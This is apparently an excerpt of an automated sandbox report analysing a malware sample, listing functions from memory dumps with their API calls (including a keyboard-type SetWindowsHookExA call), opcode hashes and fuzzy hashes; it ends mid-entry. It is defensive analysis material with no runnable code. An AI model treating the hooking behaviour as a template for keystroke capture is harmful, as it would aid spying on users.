                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID: s,s#
                                        • API String ID: 3793708945-3488363693
                                        • Opcode ID: 83bf331e12d344fdb5d1e67199b663870c05459a64c3c50f9deaca5f860d2109
                                        • Instruction ID: 0de76f811fa64f4c948fe392b463dbb55445d53c7356d37977a81c172119c4c0
                                        • Opcode Fuzzy Hash: 83bf331e12d344fdb5d1e67199b663870c05459a64c3c50f9deaca5f860d2109
                                        • Instruction Fuzzy Hash: 4521E4B5900249EFDB10CFAAD484ADEBBF4FB48310F14841AE914A3310D374A940CFA5
                                        Function 05C6FE03 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 159 5c6fe03-5c6fe52 162 5c6fe54-5c6fe5c 159->162 163 5c6fe5e-5c6fe90 SetWindowsHookExA 159->163 162->163 164 5c6fe92-5c6fe98 163->164 165 5c6fe99-5c6feb9 163->165 164->165
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,00000000), ref: 05C6FE83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID: s,s#
                                        • API String ID: 2559412058-3488363693
                                        • Opcode ID: 3fde9c5d0b4a84fbbe215a721cd4b8c28afad2675a8780149970f3862ca3d7c2
                                        • Instruction ID: 241be29509e800b2c857222336662699c3967fb756f6f39a6a6b96fd747dc5ea
                                        • Opcode Fuzzy Hash: 3fde9c5d0b4a84fbbe215a721cd4b8c28afad2675a8780149970f3862ca3d7c2
                                        • Instruction Fuzzy Hash: F32138B5D002499FDB14DF9AD844BEEFBF5FB88310F148419E419A7250C775AA40CFA0
                                        Function 05C6DB88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 169 5c6db88-5c6db93 170 5c6e170-5c6e1d2 OleInitialize 169->170 171 5c6e1d4-5c6e1da 170->171 172 5c6e1db-5c6e1f8 170->172 171->172
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 05C6E1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: s,s#
                                        • API String ID: 2538663250-3488363693
                                        • Opcode ID: 97a6a77ea184a8da6017a7b418320425e072190f31fcaea9f93fd8e7a571b54a
                                        • Instruction ID: ff0ba0d24f3846bf98ea6354b662579ec28dd706ffa9a5ee8c88402d74b5121e
                                        • Opcode Fuzzy Hash: 97a6a77ea184a8da6017a7b418320425e072190f31fcaea9f93fd8e7a571b54a
                                        • Instruction Fuzzy Hash: 201145B5800349CFCB20CF9AC485BDFBBF8EB48210F20885AD519A7700D379A644CFA5
                                        Function 05C6C2E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05C6D875), ref: 05C6D8FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID: s,s#
                                        • API String ID: 2492992576-3488363693
                                        • Opcode ID: 0b0cf9c36757702386a5e573853659f82cb59e63c43c445d21faaa17ec8476f9
                                        • Instruction ID: 6834a5d9409fe92cbe32ddd57f87b32a69b7293480590890f3ce22ad00a3a146
                                        • Opcode Fuzzy Hash: 0b0cf9c36757702386a5e573853659f82cb59e63c43c445d21faaa17ec8476f9
                                        • Instruction Fuzzy Hash: 291145B59047498FCB20DF9AD484BDEFBF4EB49314F208459D51AA3210C775AA40CFE4
                                        Function 05C6DB8C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 05C6E1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: s,s#
                                        • API String ID: 2538663250-3488363693
                                        • Opcode ID: 2b959b91c0c9d10df731626affd9a096e2fccf3bc59914cdc763590e5efbbabe
                                        • Instruction ID: 1ee507a807ed6729562ecdac0fc9096daa135f71af3f8b1ba8c69b2f7c027012
                                        • Opcode Fuzzy Hash: 2b959b91c0c9d10df731626affd9a096e2fccf3bc59914cdc763590e5efbbabe
                                        • Instruction Fuzzy Hash: B71145B4800749CFDB20DFAAC484BDEBBF8EB48214F10885AE519B7300D375A940CFA4
                                        Function 05C6E169 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 05C6E1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: s,s#
                                        • API String ID: 2538663250-3488363693
                                        • Opcode ID: eccfb521a82d5a1f27bd1ab10a03b041e7a7e71caeb7191ce369a789b823a61d
                                        • Instruction ID: cdb066f5b541d6b64359267682adb5abf7fa8b82b2a217057d7ee3cf62d4554d
                                        • Opcode Fuzzy Hash: eccfb521a82d5a1f27bd1ab10a03b041e7a7e71caeb7191ce369a789b823a61d
                                        • Instruction Fuzzy Hash: 261115B5800789CFDB10DF9AD484BDEBBF8EB48614F10885AD519A7700D379A544CFA5
                                        Function 05C6D898 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05C6D875), ref: 05C6D8FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID: s,s#
                                        • API String ID: 2492992576-3488363693
                                        • Opcode ID: e7ce09e90eba02b82b844c980fd63cbc78ab5d4b476c8fad7b6562c28a970253
                                        • Instruction ID: 2508ba1599b62ab4a9108526f4aa4f70e8d84182b29c08b9b0df40420795d047
                                        • Opcode Fuzzy Hash: e7ce09e90eba02b82b844c980fd63cbc78ab5d4b476c8fad7b6562c28a970253
                                        • Instruction Fuzzy Hash: 621142B59003498FDB10CF9AD484BDEBBF4EB08314F20881AD419A7210C375A644CFA0
                                        Function 026F4A9C Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 6ffe37b8f08c743331fc3de59983b69283a9bf573476734d964e9f1fc4f92ced
                                        • Instruction ID: d325e7ec2e1cf5f60ef9939e88eba2648cc881766bf80c91c669853382c1d46a
                                        • Opcode Fuzzy Hash: 6ffe37b8f08c743331fc3de59983b69283a9bf573476734d964e9f1fc4f92ced
                                        • Instruction Fuzzy Hash: 7DA16A71E00209CFEF50DFA9C88179EBBF2AF88714F149129DA14E7794EB749885CB91
                                        Function 026F3E84 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: c3183662aaf115a9cf124cbbd9ce230448af107f9eaaf45c62490285099c031b
                                        • Instruction ID: 75c8c66211183229821c53448dc8767d5111ae921512949fecdc60cbf30e872a
                                        • Opcode Fuzzy Hash: c3183662aaf115a9cf124cbbd9ce230448af107f9eaaf45c62490285099c031b
                                        • Instruction Fuzzy Hash: 62915970E00249DFDF50DFA8C9817AEBBF2AF88314F148129E614E7794EB749885CB95
                                        Function 026F4814 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: f16933ee9d40c59a9b6c4fc8523bdaca95b0112a52326097ee9d1c7d3fc111a6
                                        • Instruction ID: fe4ff57595bf1aede3451c3496ed8c1d089384d4287c96590e50d024343b308a
                                        • Opcode Fuzzy Hash: f16933ee9d40c59a9b6c4fc8523bdaca95b0112a52326097ee9d1c7d3fc111a6
                                        • Instruction Fuzzy Hash: 317167B0E00349DFDF50DFA9C88079EBBF2BF88714F148129EA15A7654EB749842CB95
                                        Function 026F4820 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 3194b5af6d75bd420495916133a7c472e98a88efd9f096e8577497a78ebe5029
                                        • Instruction ID: 494fe95730b797f914f4e77f85c2800c4b0bf45b9a133e8138cf658a38215f6a
                                        • Opcode Fuzzy Hash: 3194b5af6d75bd420495916133a7c472e98a88efd9f096e8577497a78ebe5029
                                        • Instruction Fuzzy Hash: 177165B0E00349DFDF54DFA9C88079EBBF2BF88714F148129EA15A7654EB749842CB85
                                        Function 026F6CF3 Relevance: 2.6, Strings: 2, Instructions: 133COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: a79b4124db796e58a2baeeecc22e489a8f2e5031a04133ea09d2e48f34b9a78b
                                        • Instruction ID: 4c9c3c83e2297c8e2a5bef0b244a0622dfff14191367e1a8d167ec6004da33d6
                                        • Opcode Fuzzy Hash: a79b4124db796e58a2baeeecc22e489a8f2e5031a04133ea09d2e48f34b9a78b
                                        • Instruction Fuzzy Hash: 6D512271D102188FDF58CFAAC884BDEBBB5BF48314F148129E825BB395D774A844CB94
                                        Function 026F6CF8 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: d4b4fbd1c1de962a1e35d25550a9af2e53d00939f093aa4a00d991ea94e4716f
                                        • Instruction ID: 2fac89e226f8d66a99b8e4d833953bddc14994ffcb6748de8e5c0cdf08fea217
                                        • Opcode Fuzzy Hash: d4b4fbd1c1de962a1e35d25550a9af2e53d00939f093aa4a00d991ea94e4716f
                                        • Instruction Fuzzy Hash: 6A512371D102188FDF58CFAAC884B9EBBB5BF48314F148529E825BB395DB74A844CF94
                                        Function 026FEDE5 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ]
                                        • API String ID: 0-3352871620
                                        • Opcode ID: 7205662b31a17b0ed493738e871bf3db4906e1e71e2827d4fd61a880ab11118d
                                        • Instruction ID: 67370274156e5cdcb9f0e78ae71f08beb41bfd0be74ba02fa6508c838200f77d
                                        • Opcode Fuzzy Hash: 7205662b31a17b0ed493738e871bf3db4906e1e71e2827d4fd61a880ab11118d
                                        • Instruction Fuzzy Hash: 6951FC35B00202CFDF459B74D96866E7BF2AB89600F148569E506DB3A5EF36CC02CB81
                                        Function 026F26ED Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#
                                        • API String ID: 0-3488363693
                                        • Opcode ID: 196d94bea1bb206a29d242da586e85dcc2faf948e298a552a0adc6fee881702f
                                        • Instruction ID: 87896a15db0dfe59e539abbf2cdaebddd60f86be044f34d1ac0bac566a1d49c4
                                        • Opcode Fuzzy Hash: 196d94bea1bb206a29d242da586e85dcc2faf948e298a552a0adc6fee881702f
                                        • Instruction Fuzzy Hash: 8741FEB4D003499FEB14DFA9C590ADEBBF5FF48314F208029E919AB250DB75994ACF90
                                        Function 026F26F8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#
                                        • API String ID: 0-3488363693
                                        • Opcode ID: 0a81ce0090f6fa68557030dd335c291956fe63014ee3d33640d83146e0ad4ac4
                                        • Instruction ID: a59e3087f1e87762be3690f05be8942d9fb57619b842fa90d719a03209b3f8cc
                                        • Opcode Fuzzy Hash: 0a81ce0090f6fa68557030dd335c291956fe63014ee3d33640d83146e0ad4ac4
                                        • Instruction Fuzzy Hash: 2241EEB4D003499FDB14DFA9C590ADEBBF5FF48314F108029E819AB250DB75A946CF90
                                        Function 026F7788 Relevance: .3, Instructions: 313COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba872bbbd556c370f5b8addc36b1e7662a516519edd7a104aa134b4013033996
                                        • Instruction ID: c9276edb7ee6a65f9bf696deb67921e9a05a8185897498dfa79916bbf9fe011e
                                        • Opcode Fuzzy Hash: ba872bbbd556c370f5b8addc36b1e7662a516519edd7a104aa134b4013033996
                                        • Instruction Fuzzy Hash: 09B15B707002069BEF26BB28E85522C73A2FBC9704F248A3DE115CB355DF79ED469B91
                                        Function 026F776A Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3cbf99c95384e96d337e58ac5df3dad282122bda0454b306724f7f9d09e9078a
                                        • Instruction ID: e5e6a8db42eae52b8f8e994c3751f5aa96f7773e78b36f5542789a3d0801083f
                                        • Opcode Fuzzy Hash: 3cbf99c95384e96d337e58ac5df3dad282122bda0454b306724f7f9d09e9078a
                                        • Instruction Fuzzy Hash: CEB15C707002069BEF26BB28E85522C73A2FBC9704F248A3DE115CB355DF79ED469B91
                                        Function 026F8E64 Relevance: .2, Instructions: 239COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcaceb2edbd47240a66512fdb5a91a804c8bf596f14528037b1d9fe285c32515
                                        • Instruction ID: 3279ea1cf1a64fdb7478920e59c3d6086de05a5dca18c77cbcfd70b1b3b50c1e
                                        • Opcode Fuzzy Hash: dcaceb2edbd47240a66512fdb5a91a804c8bf596f14528037b1d9fe285c32515
                                        • Instruction Fuzzy Hash: 11915A35A012049FDF54EF68D984AADBBB2FF88310F248569E906EB354DB31ED42CB50
                                        Function 026F112B Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c31c04e8a7a14998437e6449f101a06861262a23c0132cb5913fb18fcbd63fef
                                        • Instruction ID: 8eab603093f6a420503f9d5803157508e64061c883d6023df9c57cfe74dab463
                                        • Opcode Fuzzy Hash: c31c04e8a7a14998437e6449f101a06861262a23c0132cb5913fb18fcbd63fef
                                        • Instruction Fuzzy Hash: 0051EF75202A4AEFCB06FB68FC809593B71B7DE30470849EBD0445B27ADE70690ADF85
                                        Function 026F1138 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 564f05dda7aefc00d8b1089ab18fca5d6ecc7acb1fa22b244517e6d986481a56
                                        • Instruction ID: c396c3d6010aeb06fdb685ebeed9ff4797fedff4ee7ec6a5d94e5568d2c11213
                                        • Opcode Fuzzy Hash: 564f05dda7aefc00d8b1089ab18fca5d6ecc7acb1fa22b244517e6d986481a56
                                        • Instruction Fuzzy Hash: CE51AC35212A4AEFCB06FB68FC809593B61B7DD70430899EBD0445B279DE70690ADF85
                                        Function 026FEDF8 Relevance: .1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2efcb5a7776b181d741a5396ad49fbff6bf25193dbe760926c6ba2fa5759e247
                                        • Instruction ID: ad6c7c2877aa759d75a9847984b96b4be7f7ce3e33d17a4bf44de3e04a97b847
                                        • Opcode Fuzzy Hash: 2efcb5a7776b181d741a5396ad49fbff6bf25193dbe760926c6ba2fa5759e247
                                        • Instruction Fuzzy Hash: 7A31DE307002068FEF59AB74D654A6E3BA3BBC9700F248569D506DB3A4EF36DC42CB91
                                        Function 026FECAB Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fad3b791c62281625d50a07b140df592503ee31d9fea91d08474f9fcf32be66
                                        • Instruction ID: 935b4c444d9672a75a220e4a176202f913fde077b9af84fa4dd5e9e7adecfc42
                                        • Opcode Fuzzy Hash: 2fad3b791c62281625d50a07b140df592503ee31d9fea91d08474f9fcf32be66
                                        • Instruction Fuzzy Hash: F9317E35E00606DBDF18CF64D49569EBBB2FF89300F10C529E906EB794EB71A846CB50
                                        Function 026F71F1 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87b42bd10bbb7295151e4388356be9e63d23773bf989428f96d751acf8031e7c
                                        • Instruction ID: 0e13bf144c01c938c37e0d6e362826de6d8cad0473e3f61f0405420ff958b091
                                        • Opcode Fuzzy Hash: 87b42bd10bbb7295151e4388356be9e63d23773bf989428f96d751acf8031e7c
                                        • Instruction Fuzzy Hash: 2A315A31E50219DBEF55DFA4C48079EF7B2FF85314F208529E901EB350EB75A9428B51
                                        Function 026F7200 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66afe6cc261805ba906b8eb1e1ef5df3e69e3f4e555620f8ef123d4059f1a9f1
                                        • Instruction ID: 01ba3412b1d8c4e69313d718b0f40b8ad3b0a2bce7e03e8f9defb5b18929732a
                                        • Opcode Fuzzy Hash: 66afe6cc261805ba906b8eb1e1ef5df3e69e3f4e555620f8ef123d4059f1a9f1
                                        • Instruction Fuzzy Hash: F3313C31E10209DBEF55CBA4D4907AEF7B2FF85314F248529EA01EB350EB71A9428B50
                                        Function 026F149B Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06dacd13365a749cdafbc82413e669c319b2d4c27f2166aeef0ca63c7b57f6cc
                                        • Instruction ID: 5f7e2952c0815b074183a615a6cbf7a9c457e107dae0d1cb50a826773d4eb902
                                        • Opcode Fuzzy Hash: 06dacd13365a749cdafbc82413e669c319b2d4c27f2166aeef0ca63c7b57f6cc
                                        • Instruction Fuzzy Hash: C221D671A01211CFDFA1AFB895543AD3BB1EB8A254F1004BADA0EDB301EB35C9428B95
                                        Function 026FECB8 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a1b44e5657cb92d2f6b9982f84c8f031d4540e53beec3683e94f0fc3479a559
                                        • Instruction ID: d5e263e928596df0e4760cc66342e420477c12b65bfacdab5fda8c47ee738b8f
                                        • Opcode Fuzzy Hash: 5a1b44e5657cb92d2f6b9982f84c8f031d4540e53beec3683e94f0fc3479a559
                                        • Instruction Fuzzy Hash: 53318035E00606DBCF18CF64D45469EBBB2BF88300F10C529E906EB794DB71AC42CB50
                                        Function 026F1380 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d23442351f4a018b32c5d471b19d3e6ca04d41dd63e0273dbfd1024a36ea410d
                                        • Instruction ID: 5a4c2c3bc3689063694a5d45109c662f5630e5db9f14371bf667e83273ededea
                                        • Opcode Fuzzy Hash: d23442351f4a018b32c5d471b19d3e6ca04d41dd63e0273dbfd1024a36ea410d
                                        • Instruction Fuzzy Hash: BE21C471600305CFEF61A768E89872D3761E78B364F040CE7E60EC7345EB689C468B82
                                        Function 026F16B0 Relevance: .1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d010073d37d05cbbe4b537ed61d6ada7638037ec6a6c8046d512614d38ec9ca
                                        • Instruction ID: 98951a6903326529197c758f60bcf500292e5c41b2b4ffc300d2e675c0e74292
                                        • Opcode Fuzzy Hash: 1d010073d37d05cbbe4b537ed61d6ada7638037ec6a6c8046d512614d38ec9ca
                                        • Instruction Fuzzy Hash: B221F738100601DBEF62BB38EC987293365FB8A354F1849E6D10DC7359EB75DD018B91
                                        Function 026F8D5E Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc0d1c41135f4cbc95c6579681133262f634df821dda2772cb96d79752a1fd92
                                        • Instruction ID: 7a49e58d8f9991ef5092f3b9b3e44cc227416d05084e7c88731a2176818af3c7
                                        • Opcode Fuzzy Hash: bc0d1c41135f4cbc95c6579681133262f634df821dda2772cb96d79752a1fd92
                                        • Instruction Fuzzy Hash: F9216D31E0020A9BDF15DFA4D49069EF7B2AF89304F14C65AE905EB344EB719886CB90
                                        Function 026F8C50 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7d4898e9fa426df27302c16304ac157d39f69301ed27a1065a3d13a56078ddc
                                        • Instruction ID: b31ea98b7448f305c0a8eaf9c0073297d17228fa3f668a5efdbd850483dc8249
